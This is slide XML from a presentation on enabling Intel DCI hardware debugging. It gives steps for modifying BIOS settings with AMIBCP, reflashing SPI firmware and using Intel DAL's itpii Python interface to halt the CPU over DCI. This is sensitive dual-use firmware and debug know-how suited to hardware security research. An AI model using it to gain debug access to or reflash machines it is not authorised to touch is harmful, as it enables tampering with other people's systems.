              <a:t>Enabling Intel DCI. The simple way</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="435" name="Shape 435"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44640" cy="886680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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436" name="Shape 436"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6349349" y="1559874"/>
            <a:ext cx="5108399" cy="3290000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="437" name="Shape 437"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="562825" y="4257675"/>
            <a:ext cx="5983875" cy="17031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442" name="Shape 442"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="443" name="Shape 443"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="651050" y="1559875"/>
            <a:ext cx="3804300" cy="4134300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>BIOS image configura</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>tion tool (like AMIBCP) to enable the debugging feature through the EFI Human Interface Infrastructure (HII)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Use Intel Flash Image tool to build the new SPI flash image</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Use Intel Flash Programming tool or a hardware programmer to write the image into the SPI flash memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>
              </a:solidFill>
              <a:latin typeface="Roboto Condensed"/>
              <a:ea typeface="Roboto Condensed"/>
              <a:cs typeface="Roboto Condensed"/>
              <a:sym typeface="Roboto Condensed"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>If everything went good, you will see this in Windows Device Manager:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="444" name="Shape 444"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837640" cy="82224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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Enabling Intel DCI. The hard way</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="445" name="Shape 445"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44640" cy="886680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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446" name="Shape 446"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4906978" y="1628775"/>
            <a:ext cx="6565315" cy="2911911"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="447" name="Shape 447"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4906985" y="5216748"/>
            <a:ext cx="3657475" cy="549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452" name="Shape 452"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="453" name="Shape 453"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="641975" y="1559875"/>
            <a:ext cx="8308200" cy="4660800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-184399" lvl="0" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="76B72A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Install Intel System Studio trial with Intel D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>x Abstraction Layer (DAL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184399" lvl="0" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="76B72A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Run C:\Intel\DAL -&gt; ConfigConsole.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184399" lvl="0" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="76B72A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Run Dalstartup.py</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>
              </a:solidFill>
              <a:latin typeface="Roboto Condensed"/>
              <a:ea typeface="Roboto Condensed"/>
              <a:cs typeface="Roboto Condensed"/>
              <a:sym typeface="Roboto Condensed"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>
              </a:solidFill>
              <a:latin typeface="Roboto Condensed"/>
              <a:ea typeface="Roboto Condensed"/>
              <a:cs typeface="Roboto Condensed"/>
              <a:sym typeface="Roboto Condensed"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFE599"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>import itpii</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">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FE599"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>itp = itpii.baseaccess()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F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92D050"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t># When running using JTAG Only Mode enabled, the PREQ, PRDY, DBR and RESET</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92D050"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t># pins are considered off, and PowerGood is considered on. We also enable</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92D050"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t># TAP based break detection, and and start to poll for probe mode entry.</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92D050"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t># Triggered scans are disabled and memory scan delays are put into place.</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FE599"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>itp.jtagonlymode(0, True)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>
              </a:solidFill>
              <a:latin typeface="Roboto Condensed"/>
              <a:ea typeface="Roboto Condensed"/>
              <a:cs typeface="Roboto Condensed"/>
              <a:sym typeface="Roboto Condensed"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="175600" lvl="0" marL="180000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="77B82A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Start PythonConsole.cmd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="454" name="Shape 454"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837640" cy="82224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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Setting up Intel DFx Abstraction Layer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="455" name="Shape 455"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44640" cy="886680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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456" name="Shape 456"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4662050" y="1909500"/>
            <a:ext cx="6545074" cy="2196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461" name="Shape 461"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="462" name="Shape 462"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="641986" y="1559880"/>
            <a:ext cx="9682200" cy="4470120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="175600" lvl="0" marL="179999" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="77B82A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Halt the CPU to make sure it is operable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="EFEFE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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Registering MasterFrame...</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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Registered C:\Intel\DAL\MasterFrame.HostApplication.exe Successfully.</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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Using Intel DAL 1.9.9114.100 Built 3/29/2017 against rev ID 482226 [1714]</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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Using Python 2.7.12 (64bit), .NET 2.0.50727.8669, Python.NET 2.0.18, pyreadline 2.0.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>DCI: Target connection has been established</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
